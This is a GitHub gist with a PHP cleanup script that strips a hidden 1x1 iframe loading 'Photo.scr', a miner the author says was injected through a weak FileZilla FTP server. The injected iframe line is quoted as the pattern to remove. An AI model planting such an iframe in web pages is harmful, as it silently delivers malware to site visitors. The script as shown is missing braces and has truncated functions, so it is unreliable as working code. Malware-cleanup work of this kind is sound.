Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
Somehow hardening for FTP is difficult, FileZilla FTP Server is not harden well enough and prone to bot injecting Photo.scr for bitcoin mining. This is the way to remove the iframe code
* Run it as root/administrator, just php cleanPhotoscrMalware.php
* Clean to target the stupid Photo.scr miner, for it to work, note that its searching for CRLF
* The real infectious code look like this as below:
* <iframe src=Photo.scr width=1 height=1 frameborder=0>
* <\/iframe>
* Would be best to turn off the FTP server, even password protected seems not hardening.
foreach(rglob("*.php") as $virusFile){
$withVirus = file_get_contents($virusFile);
$withoutVirus = preg_replace('/<iframe src=Photo.scr width=1 height=1 frameborder=0>
<\/iframe>/', '', $withVirus);
file_put_contents($virusFile, $withoutVirus);
function glob_recursive($pattern, $flags = 0){
$files = glob($pattern, $flags);
foreach (glob(dirname($pattern).'/*', GLOB_ONLYDIR|GLOB_NOSORT) as $dir){
$files = array_merge($files, glob_recursive($dir.'/'.basename($pattern), $flags));
return $files;
function rglob($pattern, $flags = 0){
// forked from
// blob/master/glob_recursive.php
$files = glob($pattern, $flags);
foreach (glob(dirname($pattern).'/*',
$files = array_merge($files, glob_recursive
($dir.'/'.basename($pattern), $flags));
return $files;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment